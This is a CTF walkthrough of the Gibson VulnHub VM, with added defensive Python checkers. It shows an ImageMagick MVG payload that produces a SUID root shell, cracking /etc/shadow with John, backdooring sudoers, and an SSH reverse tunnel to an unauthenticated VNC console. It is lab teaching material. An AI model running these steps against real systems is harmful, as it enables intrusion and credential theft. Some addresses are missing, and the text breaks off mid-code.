Infosec, CTF and more

Gibson Solution

In this post I’m going to show you how to solve the Gibson VM provided by Knightmare.

You can find the VM on this link <== attacker <== victim

I run nmap to check which services are running on the machine:

nmap -sV -p- -Pn -n -v -oA

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7
MAC Address: 08:00:27:5B:0C:58 (Oracle VirtualBox virtual NIC)
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ok, just two TCP ports open.

I have a look at the website, and this is what I find: a link to

So, I click the link and this is what I find: a page that says “The answer you seek will be found by brute force”.

So, if I understand correctly, he wants me to fuzz URLs… don’t fall into the trap! I check the source code of the page instead, and this is what I find:

<title>Gibson Mining Corporation</title>
<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>
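Credentials in HTML comments are a classic finding, and they are easy to catch on your own sites before someone else does. As an added example (not part of the original writeup), here is a small Python checker that pulls every HTML comment out of a page and flags the ones that mention passwords or similar keywords. The sample page source is constructed from the lines quoted above, and the keyword list is my own assumption.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the page source quoted above, reduced to the relevant lines.
SAMPLE_HTML = """<html><head><title>Gibson Mining Corporation</title></head><body>
<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>
</body></html>"""

# Keywords that suggest a comment leaks credentials or internal detail (assumed list).
SENSITIVE = re.compile(
    r"\b(password|passwd|pwd|secret|token|api[_ -]?key|username|login|todo|fixme)\b", re.I
)


class CommentCollector(HTMLParser):
    """Collects every <!-- ... --> comment in document order."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def extract_comments(html):
    """Return all comments found in the document, stripped of surrounding whitespace."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return parser.comments


def find_sensitive_comments(html):
    """Return (comment, matched_keyword) pairs for comments that match SENSITIVE."""
    hits = []
    for comment in extract_comments(html):
        m = SENSITIVE.search(comment)
        if m:
            hits.append((comment, m.group(0).lower()))
    return hits


if __name__ == "__main__":
    comments = extract_comments(SAMPLE_HTML)
    print(f"{len(comments)} comment(s) found")
    for comment, keyword in find_sensitive_comments(SAMPLE_HTML):
        print(f"  [{keyword}] {comment}")
```

Run against a crawl of your own site, the same check turns a manual "view source" habit into something that can sit in a CI job or a content review.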

Now, since I want to trust my friend “eugene”, I try to SSH in as the user margo with the password god:

# ssh margo@
Ubuntu 14.04.3 LTS
margo@'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)

  System information as of Tue May 17 13:23:07 BST 2016

  System load: 0.0               Memory usage: 6%   Processes:       81
  Usage of /:  82.2% of 1.85GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:

margo@gibson:~$ whoami
margo@gibson:~$ id
uid=1002(margo) gid=1002(margo) groups=1002(margo),27(sudo)

It would be wonderful if I had found a full sudoer, but no: margo is not one, although she (or he) can run exactly one command through sudo:

margo@gibson:~$ sudo -l
Matching Defaults entries for margo on gibson:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User margo may run the following commands on gibson:
    (ALL) NOPASSWD: /usr/bin/convert
margo@gibson:~$ which convert

Uhm… I have a look at the passwd file:

margo@gibson:~$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
libvirt-qemu:x:106:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:107:111:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
duke:x:1000:1000:Duke Ellingson,,,:/home/duke:/bin/bash
colord:x:108:115:colord colour management daemon,,,:/var/lib/colord:/bin/false
eugene:x:1001:1001:Eugene Belford:/home/eugene:
margo:x:1002:1002:Margo Wallace:/home/margo:/bin/bash

I check whether there is any exploit for the convert command, and I find out about an ImageMagick exploit at this link. At this point I write the following MVG script, which makes convert copy /bin/sh and set the SUID bit on the copy, so that the copy spawns a root shell:

margo@gibson:~$ cat exploit.jpg 
push graphic-context
viewbox 0 0 640 480
fill 'url("|cp /bin/sh myshell; chmod 4777 myshell")'
pop graphic-context

margo@gibson:~$ sudo /usr/bin/convert exploit.jpg exploit.png
chmod: cannot access myshell: No such file or directory
convert: unrecognized color `"|cp /bin/sh myshell; chmod 4777 myshell"' @ warning/color.c/GetColorCompliance/947.
convert: unable to open image `/tmp/magick-KzaGfMI2': No such file or directory @ error/blob.c/OpenBlob/2638.
convert: unable to open file `/tmp/magick-KzaGfMI2': No such file or directory @ error/constitute.c/ReadImage/583.
convert: non-conforming drawing primitive definition `fill' @ error/draw.c/DrawImage/3158.

margo@gibson:~$ ls -l
-rw-rw-r-- 1 margo margo     146 May 17 18:46 exploit.jpg
-rw-r--r-- 1 root  root      421 May 17 18:46 exploit.png
-rwsrwxrwx 1 root  root   121272 May 17 18:46 myshell

margo@gibson:~$ ./myshell2 
# id
uid=1002(margo) gid=1002(margo) euid=0(root) groups=0(root),27(sudo),1002(margo)
# cat /etc/shadow
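Two things had to go wrong for this to work: the sudo rule lets an unprivileged user run convert as root on a file she controls, and the ImageMagick build still honours MVG drawing commands and the `url("|…")` shell delegate regardless of the .jpg extension. The usual hardening for the second part is an ImageMagick policy.xml that denies the EPHEMERAL, URL, HTTPS, MVG, MSL, TEXT, SHOW, WIN and PLT coders. As an added example that is not from the writeup, this Python script shows the kind of pre-processing check an image-handling service can run before handing a file to convert: it compares the file's magic bytes with what the extension claims and scans for text-driven coder markers and the delegate pattern used above. The sample inputs are constructed (the MVG text is the one shown above; the JPEG is a minimal JFIF header).

```python
import re

# Magic bytes for the raster formats a typical upload handler claims to accept.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
EXT_TO_TYPE = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}

# ImageMagick "coders" that are driven by text and can reach delegates or the filesystem.
TEXT_CODERS = [
    ("MVG drawing script", re.compile(rb"^\s*push\s+graphic-context", re.M)),
    ("SVG document", re.compile(rb"<\s*svg\b", re.I)),
    ("MSL script", re.compile(rb"<\s*msl\b", re.I)),
]
# Constructs that hand data to a shell or to a pseudo-protocol coder.
DANGEROUS = [
    ('url("|...") shell delegate', re.compile(rb"""url\(\s*['"]?\s*\|""")),
    ("pseudo-protocol coder", re.compile(rb"\b(ephemeral|msl|label|text|pango|url|https?)\s*:", re.I)),
]


def sniff_type(data):
    """Identify the container by magic bytes; None means no known raster format."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def audit_image(filename, data):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed, actual = EXT_TO_TYPE.get(ext), sniff_type(data)
    if claimed and actual != claimed:
        findings.append(f"extension says {claimed} but content is {actual or 'not a known raster format'}")
    for name, rx in TEXT_CODERS:
        if rx.search(data):
            findings.append(f"text-driven coder content: {name}")
    for name, rx in DANGEROUS:
        if rx.search(data):
            findings.append(f"dangerous construct: {name}")
    return findings


# Constructed samples: the MVG file from the writeup above, and a minimal real JPEG header.
MVG_SAMPLE = b"""push graphic-context
viewbox 0 0 640 480
fill 'url("|cp /bin/sh myshell; chmod 4777 myshell")'
pop graphic-context
"""
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00H\x00H\x00\x00\xff\xd9"

if __name__ == "__main__":
    for name, blob in (("exploit.jpg", MVG_SAMPLE), ("photo.jpg", JPEG_SAMPLE)):
        result = audit_image(name, blob)
        print(name, "->", "; ".join(result) if result else "ok")
```

Note that this kind of check is a second line of defence only: the policy.xml restriction and not running convert as root on user-supplied files are what actually remove the risk.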

Sweet, I have a root shell and I have all the users’ password hashes from this machine. I download the passwd and shadow files to my local machine, unshadow them and use John the Ripper to crack them:

root@kali:/media/sf_shared_folders/linux/pentest/gibson# unshadow passwd shadow > users_hashes
root@kali:/media/sf_shared_folders/linux/pentest/gibson# ls -l
total 24
-rwxrwx--- 1 root vboxsf  507 May 17 13:33
-rwxrwx--- 1 root vboxsf  761 May 17 13:33
-rwxrwx--- 1 root vboxsf 2567 May 17 13:33
-rwxrwx--- 1 root vboxsf 1545 May 18 20:02 passwd
-rwxrwx--- 1 root vboxsf 1122 May 18 20:01 shadow
-rwxrwx--- 1 root vboxsf 1836 May 18 20:06 users_hashes

root@kali:/media/sf_shared_folders/linux/pentest/gibson# john -stdin users_hashes 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press Ctrl-C to abort, or send SIGUSR1 to john process for status

It might take a while, and it’s not even certain that I’ll crack them, so in the meantime I go and check whether there’s anything else interesting on the server. After all, I’m root now ;) First of all, I prefer a bash shell to a sh shell, so I add the user margo to the sudoers file:

# vim /etc/sudoers

# User privilege specification
root    ALL=(ALL:ALL) ALL
margo   ALL=(ALL:ALL) ALL

# su - margo
margo@gibson:~$ sudo su
[sudo] password for margo: god
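Both sudo rules on this box are worth a second look from the defender's side: the NOPASSWD rule for convert seen in `sudo -l` hands root to anyone who can get a file into convert, and the line added above makes margo a second root account with the password god. The writeup edits /etc/sudoers with vim directly; `visudo` (or `visudo -c -f <file>` for a copy) is the safer route because it locks the file and rejects syntax errors that would otherwise lock everyone out of sudo. As an added example (not the writeup's own code), the Python below parses sudoers-style user specifications and flags the three patterns above. The sample rules are constructed from the ones shown on this page, and the watchlist of binaries is my own assumption.

```python
import re

# Constructed sample: the convert rule seen in `sudo -l` above, the root line,
# and the margo line added to /etc/sudoers in this step.
SUDOERS_SAMPLE = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# User privilege specification
root    ALL=(ALL:ALL) ALL
margo   ALL=(ALL) NOPASSWD: /usr/bin/convert
margo   ALL=(ALL:ALL) ALL
"""

# user  host=(runas) [TAG: ...] command[, command...]
RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
# Binaries that take caller-controlled input files and can read or write arbitrary
# paths when run as root (assumed watchlist; convert is the one on this box).
WATCHLIST = {"/usr/bin/convert"}


def parse_sudoers(text):
    """Parse user-specification lines into dicts; Defaults lines and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"user": m.group("user"), "runas": m.group("runas"), "tags": tags, "cmds": cmds})
    return rules


def audit_sudoers(text):
    """Flag rules that amount to root, skip the password, or run a watchlisted binary."""
    findings = []
    for r in parse_sudoers(text):
        who = r["user"]
        if who == "root":
            continue
        if "ALL" in r["cmds"]:
            findings.append(f"{who}: unrestricted ALL, effectively a second root account")
        if "NOPASSWD" in r["tags"]:
            findings.append(f"{who}: NOPASSWD on {', '.join(r['cmds'])}")
        for cmd in r["cmds"]:
            if cmd.split()[0] in WATCHLIST:
                findings.append(f"{who}: {cmd} runs as ({r['runas']}) on caller-supplied input")
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SUDOERS_SAMPLE):
        print("WARN", finding)
```

The parser deliberately ignores aliases and includes; on a real host, feed it the output of `sudo -l` per user or the concatenation of /etc/sudoers and /etc/sudoers.d/*.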

Sweet, now margo is a sudoer (a sudoer with god as her password…). I discover that the server is connected to another subnet, 192.168.122.x, and has an address on it; I also discover that the server is listening on port 5900 (on localhost only):

root@gibson:~# lsof -i
dhclient   529            root    6u  IPv4   9748      0t0  UDP *:bootpc 
dhclient   529            root   20u  IPv4   9682      0t0  UDP *:50353 
dhclient   529            root   21u  IPv6   9683      0t0  UDP *:12810 
sshd       946            root    3u  IPv4  10635      0t0  TCP *:ssh (LISTEN)
sshd       946            root    4u  IPv6  10637      0t0  TCP *:ssh (LISTEN)
apache2   1107            root    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1124        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1125        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1126        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1127        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1128        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
dnsmasq   1237 libvirt-dnsmasq    4u  IPv4  11066      0t0  UDP *:bootps 
dnsmasq   1237 libvirt-dnsmasq    6u  IPv4  11069      0t0  UDP 
dnsmasq   1237 libvirt-dnsmasq    7u  IPv4  11070      0t0  TCP (LISTEN)
qemu-syst 1247    libvirt-qemu   10u  IPv4  11304      0t0  TCP localhost:5900 (LISTEN)
apache2   1343        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
sshd      1901            root    3u  IPv4  25545      0t0  TCP> (ESTABLISHED)
sshd      1990           margo    3u  IPv4  25545      0t0  TCP> (ESTABLISHED)
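The interesting entry in that listing is qemu-syst on localhost:5900: the VNC console of the guest is not exposed to the network, but it is reachable by any local user, and the vncviewer output further down shows it has no authentication at all. Once an attacker has a shell, "localhost only" stops being a boundary, because an SSH port-forward carries the port anywhere. As an added example (not from the writeup), the Python below parses `lsof -i` output into its LISTEN sockets, collapses the worker processes that share one socket, and labels each listener by how far it is reachable. The sample lines are constructed from the output above; the addresses the page lost are filled with made-up lab values.

```python
import re

# Constructed sample lines in `lsof -i` format, modelled on the output above
# (the addresses that the page lost are filled with made-up lab values).
LSOF_SAMPLE = """\
COMMAND    PID            USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd       946            root    3u  IPv4  10635      0t0  TCP *:ssh (LISTEN)
sshd       946            root    4u  IPv6  10637      0t0  TCP *:ssh (LISTEN)
apache2   1107            root    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1124        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
dnsmasq   1237 libvirt-dnsmasq    7u  IPv4  11070      0t0  TCP 192.168.122.1:domain (LISTEN)
qemu-syst 1247    libvirt-qemu   10u  IPv4  11304      0t0  TCP localhost:5900 (LISTEN)
sshd      1901            root    3u  IPv4  25545      0t0  TCP 10.0.0.20:ssh->10.0.0.10:51234 (ESTABLISHED)
"""

LISTEN = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+\S+\s+(?P<fam>IPv[46])\s+\S+\s+\S+\s+"
    r"TCP\s+(?P<bind>\S+)\s+\(LISTEN\)$"
)

NETWORK = {"*", "0.0.0.0", "[::]"}
LOCAL = {"localhost", "127.0.0.1", "[::1]", "ip6-localhost"}


def parse_listeners(text):
    """Return one entry per (command, address, port) that is in LISTEN state."""
    seen, out = set(), []
    for line in text.splitlines():
        m = LISTEN.match(line)
        if not m:
            continue
        addr, port = m.group("bind").rsplit(":", 1)
        key = (m.group("cmd"), addr, port)
        if key in seen:  # worker processes (and v4/v6 pairs) share the same listener
            continue
        seen.add(key)
        scope = "network" if addr in NETWORK else "local" if addr in LOCAL else "interface"
        out.append({"cmd": m.group("cmd"), "user": m.group("user"), "addr": addr,
                    "port": port, "family": m.group("fam"), "scope": scope})
    return out


def report(text):
    """Human-readable lines; localhost-only services get a note about tunnelling."""
    lines = []
    for l in parse_listeners(text):
        note = ""
        if l["scope"] == "local":
            note = "  <- off the network, but reachable by any local user or through an SSH port-forward"
        lines.append(f'{l["cmd"]:<10} {l["user"]:<16} {l["addr"]}:{l["port"]:<7} [{l["scope"]}]{note}')
    return lines


if __name__ == "__main__":
    print("\n".join(report(LSOF_SAMPLE)))
```

For a libvirt host the fix is to give the guest's VNC console a password or, better, to bind it to a UNIX socket or require TLS, and to treat every "localhost only" service as something that needs authentication of its own.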

root@gibson:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     udp  --  anywhere             anywhere             udp dpt:domain
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:domain
ACCEPT     udp  --  anywhere             anywhere             udp dpt:bootps
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:bootps

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     all  --  anywhere        ctstate RELATED,ESTABLISHED
ACCEPT     all  --     anywhere            
ACCEPT     all  --  anywhere             anywhere            
REJECT     all  --  anywhere             anywhere             reject-with icmp-port-unreachable
REJECT     all  --  anywhere             anywhere             reject-with icmp-port-unreachable

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     udp  --  anywhere             anywhere             udp dpt:bootpc

root@gibson:~# ps aux | grep qemu-syst
libvirt+  1247  0.5 14.6 841876 111356 ?       Sl   13:23   2:07 /usr/bin/qemu-system-x86_64 -name ftpserv -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 256 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid ebcdaa6c-b10a-d758-c13a-0fb296b011f1 -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/ftpserv.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/ftpserv.img,if=none,id=drive-ide0-0-0,format=raw -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=2 -drive if=none,id=drive-ide0-1-0,readonly=on,format=raw -device ide-cd,bus=ide.1,unit=0,drive=drive-ide0-1-0,id=ide0-1-0,bootindex=1 -netdev tap,fd=23,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:72:e2:fb,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device intel-hda,id=sound0,bus=pci.0,addr=0x4 -device hda-duplex,id=sound0-codec0,bus=sound0.0,cad=0 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x5
root      3166  0.0  0.2  11756  2256 pts/3    S+   20:04   0:00 grep --color=auto qemu-syst

It looks like a VM is running on the server, and its disk image is located at /var/lib/libvirt/images/ftpserv.img. Since the VNC port is bound to localhost, I create a reverse port forward from the server to my local machine so that I can connect over VNC to the VM running on the server:

root@gibson:~# ssh root@ -R 1111:localhost:5900 -N
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is b2:bf:20:bb:1a:e7:2e:bc:e0:26:1d:fb:f1:c8:7e:46.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
root@'s password: 
Permission denied, please try again.
root@'s password: 

root@gibson:~# ssh root@ -R 1111:localhost:5900 -N

root@kali:/media/sf_shared_folders/linux/pentest/gibson# vncviewer localhost:1111
Connected to RFB server, using protocol version 3.8
No authentication needed
Authentication successful
Desktop name "QEMU (ftpserv)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

Once connected, a terminal appears. I wander around and find a folder called GARBAGE (having watched Hackers, I have a feeling I’m on the right track). I get the files from that folder to my local machine to inspect them. There are three files:

root@kali:/media/sf_shared_folders/linux/pentest/gibson/GARBAGE# ls -l
total 164
-rwxrwx--- 1 root vboxsf 73185 May 17 21:11 ADMINSPO.JPG
-rwxrwx--- 1 root vboxsf 87902 May 17 21:15 FLAG.IMG
-rwxrwx--- 1 root vboxsf  1577 May 19 13:43 JZ_UG.ANS

All the files that I inspect are corrupted, so I download the disk image of the VM running on the server (/var/lib/libvirt/images/ftpserv.img) and mount it on my computer:

root@kali:/media/root/KFYLNN1/GARBAGE# ls -l
total 856
-rw-r--r-- 1 root root 123141 May  4 22:17 adminspo.jpg
-rw-r--r-- 1 root root 737280 May 14 14:19 flag.img
-rw-r--r-- 1 root root   1601 Jun 11  2002 jz_ug.ans

root@kali:/media/root/KFYLNN1/GARBAGE# exif adminspo.jpg 
EXIF tags in 'ADMINSPO.JPG' ('Motorola' byte order):
Tag                 |Value
Image Description   |Rabbit.. Flu Shot... TYPE COOKE YOU IDIOT! I'll head them 
Date and Time       |2016:05:04 22:29:32
Artist              |Virtualization is fun.. What's more, esoteric OSes on 192.
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |Inch
User Comment        |So there's info here.... Images, hmm... Wasn't that a CVE.
Exif Version        |Exif Version 2.1
FlashPixVersion     |FlashPix Version 1.0
Colour Space        |Internal error (unknown value 65535)
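The hints here live in EXIF tags, which is also where real-world uploads leak names, locations and internal notes, so it pays to know what the container looks like rather than only what a tool prints. As an added example (not the writeup's code), the Python below builds a minimal JPEG carrying a big-endian ("Motorola", the byte order shown above) EXIF block and then parses it back by walking the JPEG segment chain to APP1 and decoding IFD0. The tag strings are the ones the exif tool printed above; the JPEG itself is a constructed fixture with no image data.

```python
import struct

TAG_NAMES = {0x010E: "Image Description", 0x013B: "Artist",
             0x011A: "X-Resolution", 0x0128: "Resolution Unit"}
TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1}   # BYTE, ASCII, SHORT, LONG, RATIONAL, UNDEFINED


def build_exif_jpeg(ascii_tags, xres=72):
    """Construct a minimal JPEG with a big-endian ('Motorola') EXIF IFD0. Test fixture only."""
    n = len(ascii_tags) + 2                      # ASCII tags + XResolution + ResolutionUnit
    data_off = 8 + 2 + 12 * n + 4                # out-of-line values start right after the IFD
    entries, extra = [], b""
    for tag, text in ascii_tags.items():
        raw = text.encode("ascii") + b"\x00"
        if len(raw) <= 4:                        # short values are stored inline, left-justified
            entries.append(struct.pack(">HHI", tag, 2, len(raw)) + raw.ljust(4, b"\x00"))
        else:
            entries.append(struct.pack(">HHII", tag, 2, len(raw), data_off + len(extra)))
            extra += raw
    entries.append(struct.pack(">HHII", 0x011A, 5, 1, data_off + len(extra)))  # RATIONAL, out-of-line
    extra += struct.pack(">II", xres, 1)
    entries.append(struct.pack(">HHIH2x", 0x0128, 3, 1, 2))                     # SHORT 2 = inch, inline
    entries.sort()                               # TIFF wants ascending tag order; tag is the first field
    tiff = (b"MM\x00\x2a" + struct.pack(">I", 8) + struct.pack(">H", n)
            + b"".join(entries) + struct.pack(">I", 0) + extra)
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def _parse_ifd0(t):
    """Decode the first IFD of a TIFF block into {tag name: value}."""
    endian = {b"MM": ">", b"II": "<"}[t[:2]]     # MM = Motorola (big-endian), II = Intel
    ifd = struct.unpack(endian + "I", t[4:8])[0]
    count = struct.unpack(endian + "H", t[ifd:ifd + 2])[0]
    out = {}
    for i in range(count):
        e = ifd + 2 + 12 * i
        tag, typ, n = struct.unpack(endian + "HHI", t[e:e + 8])
        size = TYPE_SIZE.get(typ, 1) * n
        if size > 4:                             # value field holds an offset into the TIFF block
            off = struct.unpack(endian + "I", t[e + 8:e + 12])[0]
            raw = t[off:off + size]
        else:
            raw = t[e + 8:e + 8 + size]
        if typ == 2:
            val = raw.rstrip(b"\x00").decode("ascii", "replace")
        elif typ in (3, 4):
            vals = struct.unpack(endian + ("H" if typ == 3 else "I") * n, raw)
            val = vals[0] if n == 1 else vals
        elif typ == 5:
            num, den = struct.unpack(endian + "II", raw[:8])
            val = num / den if den else None
        else:
            val = raw
        out[TAG_NAMES.get(tag, f"0x{tag:04X}")] = val
    return out


def parse_exif(jpeg):
    """Walk the JPEG segment chain to the APP1/Exif segment and decode IFD0."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg):
        marker = struct.unpack(">H", jpeg[pos:pos + 2])[0]
        if marker in (0xFFD9, 0xFFDA):           # EOI or start-of-scan: metadata is behind us
            break
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        seg = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xFFE1 and seg.startswith(b"Exif\x00\x00"):
            return _parse_ifd0(seg[6:])
        pos += 2 + length
    return {}


# Constructed sample using the strings the exif tool printed above.
SAMPLE = build_exif_jpeg({
    0x010E: "Rabbit.. Flu Shot... TYPE COOKE YOU IDIOT! I'll head them",
    0x013B: "Virtualization is fun.. What's more, esoteric OSes on 192.",
})

if __name__ == "__main__":
    for name, value in parse_exif(SAMPLE).items():
        print(f"{name:<20}|{value}")
```

The parser stops at the first IFD on purpose; the Exif sub-IFD (where User Comment lives) hangs off tag 0x8769 and is walked the same way with a different offset.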

root@kali:/media/root/KFYLNN1/GARBAGE# cat jz_ug.ans

    [ANSI art banner (CP437 block characters, which a UTF-8 terminal shows as replacement glyphs), tagged “jz”]
                    the ugliest of all are under 5 feet tall

root@kali:/media/root/KFYLNN1/GARBAGE# file flag.img
flag.img: Linux rev 1.0 ext2 filesystem data, UUID=d59bdd40-ec37-4d24-a956-80f549846121

I mount the ext2 image flag.img and this is what I find:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 70
drwxr-xr-x  4 root root  1024 May 14 14:07 .
drwxr-x---+ 5 root root  4096 May 19 14:55 ..
-rwxrwxr-x  1 root root 21358 Nov 16  2011 davinci
-rw-r--r--  1 root root 28030 Nov 16  2011 davinci.c
-rw-r--r--  1 root root   159 May  5 19:56 hint.txt
drwx------  2 root root 12288 May  5 19:39 lost+found
drwxr-xr-x  2 root root  1024 May  5 20:07 .trash

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cd .trash
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 319
drwxr-xr-x 2 root root   1024 May  5 20:07 .
drwxr-xr-x 4 root root   1024 May 14 14:07 ..
---x------ 1 root root    469 May 14 14:18 flag.txt.gpg
-rw-r--r-- 1 root root 320130 Sep  7  2015 LeithCentralStation.jpg

I check the hint.txt file and this is what I find:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cat hint.txt and have
someone in common... Can you remember his
original nom de plume in 1988...?

The only person these two films have in common is Jonny Lee Miller. I check his Wikipedia page and see that his nom de plume (or nickname) was Zero Cool. I try to decrypt flag.txt.gpg with the passphrase zerocool, but it doesn’t work. After various attempts, I create a wordlist with all the case and character-substitution variants of the word zerocool, and in the end the right passphrase turns out to be Z3r0K00l:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121/.trash# gpg --decrypt flag.txt.gpg 
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
 _   _            _      _____ _             ____  _                  _   _
| | | | __ _  ___| | __ |_   _| |__   ___   |  _ \| | __ _ _ __   ___| |_| |
| |_| |/ _` |/ __| |/ /   | | | '_ \ / _ \  | |_) | |/ _` | '_ \ / _ \ __| |
|  _  | (_| | (__|   <    | | | | | |  __/  |  __/| | (_| | | | |  __/ |_|_|
|_| |_|\__,_|\___|_|\_\   |_| |_| |_|\___|  |_|   |_|\__,_|_| |_|\___|\__(_)

Should you not be standing in a 360 degree rotating payphone when reading
this flag...? B-)

Anyhow, congratulations once more on rooting this VM. This time things were
a bit esoteric, but I hope you enjoyed it all the same.

Shout-outs again to #vulnhub for hosting a great learning tool. A special
thanks goes to g0blin and GKNSB for testing, and to g0tM1lk for the offer
to host the CTF once more.
gpg: WARNING: message was not integrity protected
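The passphrase hunt makes a point that is worth stating explicitly: swapping letters for digits and changing case adds very little to a passphrase built on a guessable word. As an added example (not from the writeup), the Python below does the check the way a password-strength filter would, without enumerating anything: it tests whether a candidate is a per-character variant of a themed dictionary word and reports how small the variant space of that word is. The substitution table and the themed wordlist are my own assumptions.

```python
import math

# Assumed substitution table: the common case/"leet" swaps a mangling rule set tries first,
# plus the c->k swap that the Z3r0K00l passphrase used.
SUBS = {"a": "4@", "e": "3", "i": "1!", "o": "0", "s": "5$", "t": "7", "c": "k"}


def pool(base_char):
    """All characters a single base letter may be written as under SUBS plus case changes."""
    chars = {base_char, base_char.upper()}
    for alt in SUBS.get(base_char, ""):
        chars.add(alt)
        if alt.isalpha():
            chars.add(alt.upper())
    return chars


def variant_count(word):
    """Size of the candidate space for `word` (each position chosen independently)."""
    total = 1
    for ch in word.lower():
        total *= len(pool(ch))
    return total


def is_variant_of(candidate, base):
    """True if `candidate` is `base` with per-character case/substitution changes only."""
    if len(candidate) != len(base):
        return False
    return all(c in pool(b) for c, b in zip(candidate, base.lower()))


def check_password(candidate, wordlist):
    """Return the dictionary word `candidate` is a trivial variant of, or None."""
    for word in wordlist:
        if is_variant_of(candidate, word):
            return word
    return None


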